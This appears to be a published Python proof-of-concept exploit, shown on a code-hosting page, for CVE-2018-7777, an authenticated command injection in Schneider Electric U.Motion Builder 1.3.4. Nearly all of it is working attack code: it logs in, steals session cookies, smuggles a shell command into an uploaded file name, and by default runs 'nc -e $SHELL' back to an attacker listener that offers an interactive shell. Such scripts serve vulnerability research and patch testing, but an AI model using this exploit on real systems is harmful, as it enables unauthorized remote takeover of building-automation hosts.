226 lines
No EOL
7.4 KiB
Python
Executable file
226 lines
No EOL
7.4 KiB
Python
Executable file
# Exploit Title: Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection
|
|
# Date: 2018-08-01
|
|
# Exploit Author: Cosmin Craciun
|
|
# Vendor Homepage: https://www.se.com
|
|
# Version: <= 1.3.4
|
|
# Tested on: Delivered Virtual Appliance running on Windows 10 x64
|
|
# CVE : CVE-2018-7777
|
|
# References: https://github.com/cosmin91ro
|
|
|
|
#!/usr/bin/oython
|
|
|
|
|
|
from __future__ import print_function
|
|
import httplib
|
|
import urllib
|
|
import argparse
|
|
import re
|
|
import sys
|
|
import socket
|
|
import threading
|
|
import time
|
|
|
|
parser = argparse.ArgumentParser(description='PoC')
|
|
parser.add_argument('--target', help='IP or hostname of target', required=True)
|
|
parser.add_argument('--port', help='TCP port the target app is running', required=True, default='8080')
|
|
parser.add_argument('--username', help='TCP port the target app is running', required=True, default='admin')
|
|
parser.add_argument('--password', help='TCP port the target app is running', required=True, default='admin')
|
|
parser.add_argument('--command', help='malicious command to run', default='shell')
|
|
parser.add_argument('--src_ip', help='IP of listener for the reverse shell', required=True)
|
|
parser.add_argument('--timeout', help='time in seconds to wait for a response', type=int, default=3)
|
|
|
|
class Exploiter(threading.Thread):
|
|
def __init__ (self, target, port, timeout, uri, body, headers, shell_mode):
|
|
threading.Thread.__init__(self)
|
|
self.target = target
|
|
self.port = port
|
|
self.timeout = timeout
|
|
self.uri = uri
|
|
self.body = body
|
|
self.headers = headers
|
|
self.shell_mode = shell_mode
|
|
|
|
def send_exploit(self, target, port, timeout, uri, body, headers):
|
|
print('Sending exploit ...')
|
|
conn = httplib.HTTPConnection("{0}:{1}".format(target, port), timeout=timeout)
|
|
conn.request("POST", uri, body, headers)
|
|
print("Exploit sent")
|
|
if not self.shell_mode: print("Getting response ...")
|
|
|
|
try:
|
|
response = conn.getresponse()
|
|
if not self.shell_mode: print(str(response.status) + " " + response.reason)
|
|
data = response.read()
|
|
if not self.shell_mode: print('Response: {0}\r\nCheck the exploit result'.format(data))
|
|
|
|
except socket.timeout:
|
|
if not self.shell_mode: print("Connection timeout while waiting response from the target.\r\nCheck the exploit result")
|
|
|
|
def run(self):
|
|
self.send_exploit(self.target, self.port, self.timeout, self.uri, self.body, self.headers)
|
|
|
|
class Listener(threading.Thread):
|
|
def __init__(self, src_ip):
|
|
threading.Thread.__init__(self)
|
|
self.src_ip = src_ip
|
|
|
|
def run(self):
|
|
self.listen(self.src_ip)
|
|
|
|
def listen(self, src_ip):
|
|
TCP_IP = src_ip
|
|
TCP_PORT = 4444
|
|
BUFFER_SIZE = 1024
|
|
|
|
try:
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.bind((TCP_IP, TCP_PORT))
|
|
print("Listener open on port {0}".format(TCP_PORT))
|
|
s.listen(1)
|
|
|
|
conn, addr = s.accept()
|
|
print('Exploited: ' + str(addr))
|
|
|
|
while 1:
|
|
comm = raw_input("shell$ ").strip()
|
|
if comm == "quit":
|
|
conn.close()
|
|
sys.exit(0)
|
|
|
|
if comm != "":
|
|
conn.send(comm + " 2>&1" + "\x0a")
|
|
while 1:
|
|
data = conn.recv(BUFFER_SIZE)
|
|
if not data: break
|
|
print(data, end="")
|
|
if "\x0a" in data: break
|
|
|
|
except Exception as ex:
|
|
print("Could not start listener")
|
|
print(ex)
|
|
|
|
def login(target, port, username, password):
|
|
uri = "http://{0}:{1}/umotion/modules/system/user_login.php".format(target, port)
|
|
|
|
params = urllib.urlencode({
|
|
'username': username,
|
|
'password': password,
|
|
'rememberMe': '1',
|
|
'context': 'configuration',
|
|
'op': 'login'
|
|
})
|
|
|
|
headers = {
|
|
"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
|
|
"Accept": "*/*"
|
|
}
|
|
|
|
try:
|
|
conn = httplib.HTTPConnection("{0}:{1}".format(target, port))
|
|
conn.request("POST", uri, params, headers)
|
|
response = conn.getresponse()
|
|
print(str(response.status) + " " + response.reason)
|
|
data = response.read()
|
|
except socket.timeout:
|
|
print("Connection timeout while logging in. Check if the server is available")
|
|
return
|
|
|
|
|
|
cookie = response.getheader("Set-Cookie")
|
|
#print(cookie)
|
|
|
|
r = re.match(r'PHPSESSID=(.{26});.*loginSeed=(.{32})', cookie)
|
|
if r is None:
|
|
print("Regex not match, could not get cookies")
|
|
return
|
|
|
|
if len(r.groups()) < 2:
|
|
print("Error while getting cookies")
|
|
return
|
|
|
|
sessid = r.groups()[0]
|
|
login_seed = r.groups()[1]
|
|
|
|
return sessid, login_seed
|
|
|
|
conn.close()
|
|
|
|
|
|
def encode_multipart_formdata(fields, files):
|
|
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
|
|
CRLF = '\r\n'
|
|
L = []
|
|
for (key, value) in fields:
|
|
L.append('--' + LIMIT)
|
|
L.append('Content-Disposition: form-data; name="%s"' % key)
|
|
L.append('')
|
|
L.append(value)
|
|
for (key, filename, value) in files:
|
|
L.append('--' + LIMIT)
|
|
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
|
|
L.append('Content-Type: application/x-gzip')
|
|
L.append('')
|
|
L.append(value)
|
|
L.append('--' + LIMIT + '--')
|
|
L.append('')
|
|
body = CRLF.join(L)
|
|
content_type = 'multipart/form-data; boundary=%s' % LIMIT
|
|
return content_type, body
|
|
|
|
|
|
def exploit(target, port, username, password, command, timeout):
|
|
uri = "http://{0}:{1}/umotion/modules/system/update_module.php".format(target, port)
|
|
|
|
fields = [
|
|
('choose_update_mode', 'MANUAL'),
|
|
('add_button', '0'),
|
|
('format', 'json'),
|
|
('step', '2'),
|
|
('next', '1'),
|
|
('name_update_file', ''),
|
|
('path_update_file', ''),
|
|
('type_update_file', '')
|
|
]
|
|
|
|
listener = None
|
|
if command == "shell":
|
|
shell_mode = True
|
|
command = "nc -e $SHELL {0} 4444".format(args.src_ip)
|
|
listener = Listener(args.src_ip)
|
|
listener.start()
|
|
time.sleep(3)
|
|
else:
|
|
shell_mode = False
|
|
|
|
files = [
|
|
('update_file', 'my;{0};file.tar.gz'.format(command), "\x1f\x8b")
|
|
]
|
|
|
|
content_type, body = encode_multipart_formdata(fields, files)
|
|
|
|
if not shell_mode or (shell_mode and listener and listener.isAlive()):
|
|
print('Logging in ...')
|
|
sess_id, login_seed = login(target, port, username, password)
|
|
if sess_id is None or login_seed is None:
|
|
print('Error while logging in')
|
|
return
|
|
|
|
print('Logged in ! ')
|
|
|
|
headers = {
|
|
'Accept': 'application/json,text/javascript,*/*; q=0.01',
|
|
'Accept-Encoding': 'gzip,deflate',
|
|
'Referer': 'http://{0}:{1}/umotion/modules/system/externalframe.php?context=configuration'.format(target, port),
|
|
'X-Requested-With': 'XMLHttpRequest',
|
|
'Content-Length': len(body),
|
|
'Content-Type': content_type,
|
|
'Connection': 'keep-alive',
|
|
'Cookie': 'PHPSESSID={0}; loginSeed={1}'.format(sess_id, login_seed)
|
|
}
|
|
|
|
exploiter = Exploiter(target, port, timeout, uri, body, headers, shell_mode)
|
|
exploiter.start()
|
|
|
|
if __name__ == '__main__':
|
|
args = parser.parse_args()
|
|
exploit(args.target, args.port, args.username, args.password, args.command, args.timeout) |